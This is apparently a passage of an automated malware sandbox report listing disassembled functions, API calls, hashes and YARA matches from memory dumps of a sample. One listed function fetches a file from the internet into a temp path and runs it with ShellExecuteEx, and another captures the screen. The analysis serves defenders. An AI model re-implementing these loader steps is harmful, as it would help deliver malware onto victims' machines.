                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                      • Instruction ID: 7b8f1cd0fbcf866872d83eff3452a2bd58ee1462703e5eff87a62bbdf729000e
                                                      • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                      • Instruction Fuzzy Hash: E3614971700B0866EB346A688C95BBE7395AF61B08F84051EDBD3DF7C0F616F9428359
                                                      Function 00427806 Relevance: .2, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction ID: eb18823bf6c30dc543e1166231bbc17f0f2db483a807da6279e59b8cf65918ce
                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction Fuzzy Hash: 1D81767230D0B34AEB694239957843FFFE15A923A135A079FD4F2CA2C1ED288654D724
                                                      Function 046F7A6D Relevance: .2, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction ID: f747cee806100c10cfbe0eccfe513596cb2b3fa908a4046c626276a9a219c633
                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction Fuzzy Hash: 9A8155722090A34EDB2E4A398C7443EFFE15B522A331A179ED5F2CA2C5FD24E165D620
                                                      Function 00428570 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: e424a7d7687463a037108835ac45f21073ba03c709bb761916e79cfb3ae354be
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 5311387730307253D604862DF8B46BFA395EBD53207ED427FC0428B748DA2AE9C19908
                                                      Function 046F87D7 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: 503392b29af586815fe977f013ed040b2a6932679ea943dc9dbb3a3131701715
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 83113B773010414797149A2ECCB41BAA795EBE63A07AC42F9C3E24B358F322F541D500
                                                      Function 02C0DA5B Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2c0d000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction ID: f7a652430ea48b51488ca4aadfc73871e9ec570b83cb0740f85c35021d2872cc
                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction Fuzzy Hash: C9118E72384100AFDB44DF96DCC0FA673EAEB88270B198065ED06CB356D775E842CB60
                                                      Function 046D0D90 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction ID: e3089ebc58c46d0fd9d889f689c064b6f9a91c99362cae92cf21caf02abb4adc
                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction Fuzzy Hash: 3101A776E006048FDF21CF24C804BAA33F5EB85219F4544AAE50797342F774B9418B90
                                                      Function 00402107 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402142
                                                      • GetClientRect.USER32(?,?), ref: 00402157
                                                      • GetDC.USER32(?), ref: 0040215E
                                                      • CreateSolidBrush.GDI32(00646464), ref: 00402171
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00402185
                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402190
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0040219E
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021B1
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021BC
                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 004021C5
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021E9
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004021F7
                                                      • SetBkMode.GDI32(?,00000001), ref: 00402274
                                                      • SetTextColor.GDI32(?,00000000), ref: 00402283
                                                      • _wcslen.LIBCMT ref: 0040228C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                      • String ID: Tahoma
                                                      • API String ID: 3832963559-3580928618
                                                      • Opcode ID: 815c4a87b7b94f2fc3b2348d308f3a6303f78e2cacf9c8be4fdb62532196feef
                                                      • Instruction ID: 1492cd055d75f4dcf8d6c492afaf364a2e49ccf6844f45952de134af76b70ab5
                                                      • Opcode Fuzzy Hash: 815c4a87b7b94f2fc3b2348d308f3a6303f78e2cacf9c8be4fdb62532196feef
                                                      • Instruction Fuzzy Hash: 1171FF72900228AFDB22DF64DD85FAEBBBCEB09751F0041A5B609E6155DA74AF80CF14
                                                      Function 00402582 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 004025DE
                                                      • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025F0
                                                      • ReleaseCapture.USER32 ref: 00402603
                                                      • GetDC.USER32(00000000), ref: 0040262A
                                                      • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026B1
                                                      • CreateCompatibleDC.GDI32(?), ref: 004026BA
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004026C4
                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026F2
                                                      • ShowWindow.USER32(?,00000000), ref: 004026FB
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0040270D
                                                      • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402728
                                                      • DeleteFileW.KERNEL32(?), ref: 00402742
                                                      • DeleteDC.GDI32(00000000), ref: 00402749
                                                      • DeleteObject.GDI32(00000000), ref: 00402750
                                                      • ReleaseDC.USER32(00000000,?), ref: 0040275E
                                                      • DestroyWindow.USER32(?), ref: 00402765
                                                      • SetCapture.USER32(?), ref: 004027B2
                                                      • GetDC.USER32(00000000), ref: 004027E6
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004027FC
                                                      • GetKeyState.USER32(0000001B), ref: 00402809
                                                      • DestroyWindow.USER32(?), ref: 0040281E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                      • String ID: gya
                                                      • API String ID: 2545303185-1989253062
                                                      • Opcode ID: 5a8c514e44ded35b0adfbcc0c63d93990d9580e4b737f33107eb22fc96166e5b
                                                      • Instruction ID: d31b96895c31ceb89adb1611ca46d69af71d1c98fc3259fe66be75f044b8c494
                                                      • Opcode Fuzzy Hash: 5a8c514e44ded35b0adfbcc0c63d93990d9580e4b737f33107eb22fc96166e5b
                                                      • Instruction Fuzzy Hash: 086193B5900209AFCB28AF64DD48FA97BB5FF49706F044179F605E22A2D778CA41CB1C
                                                      Function 0042E6C2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                      • Instruction ID: 0563f902f2d29fd0dd5527abd6fb3472a23659a2d418bea713265d38096b261b
                                                      • Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                      • Instruction Fuzzy Hash: B6B1AEB1A002059EDB21DF66D881BEEBBB4FF08304F54446FF995A7342D67AA941CB24
                                                      Function 046FE929 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                      • Instruction ID: 88f01f5f0b15a8ce2b41d80f45de304f00f268257d2efb3de5444131e72d6ab1
                                                      • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                      • Instruction Fuzzy Hash: 0AB1BEB1901205DFEB219F69CC80BEEBBF5BF09308F144169E995A7391E736A8459B20
                                                      Function 0043A608 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 0043A64C
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 004399B8
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 004399CA
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 004399DC
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 004399EE
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A00
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A12
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A24
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A36
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A48
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A5A
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A6C
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A7E
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A90
                                                      • _free.LIBCMT ref: 0043A641
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 0043A663
                                                      • _free.LIBCMT ref: 0043A678
                                                      • _free.LIBCMT ref: 0043A683
                                                      • _free.LIBCMT ref: 0043A6A5
                                                      • _free.LIBCMT ref: 0043A6B8
                                                      • _free.LIBCMT ref: 0043A6C6
                                                      • _free.LIBCMT ref: 0043A6D1
                                                      • _free.LIBCMT ref: 0043A709
                                                      • _free.LIBCMT ref: 0043A710
                                                      • _free.LIBCMT ref: 0043A72D
                                                      • _free.LIBCMT ref: 0043A745
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction ID: 043ee058ae0440c8c6be1a9be8146c9f0871b0b64c066d2b7e4cd08506a5a284
                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction Fuzzy Hash: F9315B315002009FEB319B3AD846B5777E8EB18315F14A42FE4E9C6291DB3AED608B1A
                                                      Function 0470A86F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 0470A8B3
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C1F
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C31
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C43
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C55
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C67
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C79
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C8B
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C9D
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CAF
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CC1
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CD3
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CE5
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CF7
                                                      • _free.LIBCMT ref: 0470A8A8
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 0470A8CA
                                                      • _free.LIBCMT ref: 0470A8DF
                                                      • _free.LIBCMT ref: 0470A8EA
                                                      • _free.LIBCMT ref: 0470A90C
                                                      • _free.LIBCMT ref: 0470A91F
                                                      • _free.LIBCMT ref: 0470A92D
                                                      • _free.LIBCMT ref: 0470A938
                                                      • _free.LIBCMT ref: 0470A970
                                                      • _free.LIBCMT ref: 0470A977
                                                      • _free.LIBCMT ref: 0470A994
                                                      • _free.LIBCMT ref: 0470A9AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction ID: 12c28b19e66dc0296096a4f3a46065d8a30247c9e3738b5069a42c295ca65a70
                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction Fuzzy Hash: C0315A71602301DFEB31AB78D848B5AB3E9AF11318F10C629E849D73D0DA36B895DB24
                                                      Function 046F0C36 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 136threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 046F0C46
                                                      • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 046F0CAD
                                                      • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 046F0CCA
                                                      • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 046F0D30
                                                      • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 046F0D45
                                                      • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 046F0D57
                                                      • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 046F0D85
                                                      • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 046F0D90
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F0DBC
                                                      • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 046F0DCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                      • String ID: "1@
                                                      • API String ID: 3720063390-1946750398
                                                      • Opcode ID: 0da021dce339e6c5e70aef212f33f501f174c1cfcf747e02e6bdfd12c65449a8
                                                      • Instruction ID: 6ffa01252ccc211ddf83f601615f4f0b2e6a17687cd414e7bfa52affffbe9d82
                                                      • Opcode Fuzzy Hash: 0da021dce339e6c5e70aef212f33f501f174c1cfcf747e02e6bdfd12c65449a8
                                                      • Instruction Fuzzy Hash: 27419170A052449BEF14FBA488547FD7BA5AF42348F04406ECA865B283FB757E06CB69
                                                      Function 00439A99 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                      • Instruction ID: 195640b83fa4041eb123fba71c0e82297226833d55f527a477398d12d2dd32bd
                                                      • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                      • Instruction Fuzzy Hash: DFC14172E40205BBDB20DBA9CC43FEF77B8AB08744F15516AFA44FB282D6B49D418764
                                                      Function 046D2C6C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 046D2C8F
                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 046D2CA5
                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 046D2CC1
                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 046D2CD7
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 046D2D10
                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 046D2D4C
                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 046D2D69
                                                      • ShellExecuteExW.SHELL32(?), ref: 046D2DE0
                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 046D2DF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                      • String ID: <
                                                      • API String ID: 838076374-4251816714
                                                      • Opcode ID: 50495f8a938e9b7a5c9bfa4e26d13ce4a8d9663e1cccc8122135cbc2badad0f5
                                                      • Instruction ID: 1f1809e748a11fa2124e8a5f495f23b8e7dd1d6a4aa3c5d865dd1cb362ec0e05
                                                      • Opcode Fuzzy Hash: 50495f8a938e9b7a5c9bfa4e26d13ce4a8d9663e1cccc8122135cbc2badad0f5
                                                      • Instruction Fuzzy Hash: 5E414F7190061CAEEB209F64DC85FEAB7BCFF15745F0081F9A549E2150EE709E868FA4
                                                      Function 0042485D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424876
                                                        • Part of subcall function 00424B45: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245A9), ref: 00424B55
                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042488B
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042489A
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004248A8
                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042491E
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042495E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042496C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                      • String ID: "1@$pContext$switchState
                                                      • API String ID: 3151764488-3271222483
                                                      • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                      • Instruction ID: ab6feeab3b7a6b85191c522ab8c92a4af9d5d2bb2e0248aa5a41338dc0268d27
                                                      • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                      • Instruction Fuzzy Hash: 2D31D635B002249BCF04EF69D881A6E73B5FF84314F61456BE915A7382DB78EE05CB98
                                                      Function 046EEED2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C23,000000FF,?,046EF238,00000004,046E7D97,00000004,046E8079), ref: 046EEF09
                                                      • GetLastError.KERNEL32(?,046EF238,00000004,046E7D97,00000004,046E8079,?,046E87A9,?,00000008,046E801D,00000000,?,?,00000000,?), ref: 046EEF15
                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,046EF238,00000004,046E7D97,00000004,046E8079,?,046E87A9,?,00000008,046E801D,00000000,?,?,00000000), ref: 046EEF25
                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 046EEF3B
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF51
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF68
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF7F
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF96
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEFAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                      • String ID: advapi32.dll
                                                      • API String ID: 2340687224-4050573280
                                                      • Opcode ID: 0e0aa7511f727ecc6fb206cd812b8d5cbe6e85ff873638c6fe134d9629160755
                                                      • Instruction ID: 9e3647531117448f5d51b9fab89939a81cb28f20c174702abcb505e23893115a
                                                      • Opcode Fuzzy Hash: 0e0aa7511f727ecc6fb206cd812b8d5cbe6e85ff873638c6fe134d9629160755
                                                      • Instruction Fuzzy Hash: 452195B1915710BFE7106FB9DC48A69BFECEF05B16F004A2AF541D3640DB7C95408BA8
                                                      Function 046EEED5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C23,000000FF,?,046EF238,00000004,046E7D97,00000004,046E8079), ref: 046EEF09
                                                      • GetLastError.KERNEL32(?,046EF238,00000004,046E7D97,00000004,046E8079,?,046E87A9,?,00000008,046E801D,00000000,?,?,00000000,?), ref: 046EEF15
                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,046EF238,00000004,046E7D97,00000004,046E8079,?,046E87A9,?,00000008,046E801D,00000000,?,?,00000000), ref: 046EEF25
                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 046EEF3B
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF51
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF68
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF7F
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF96
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEFAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
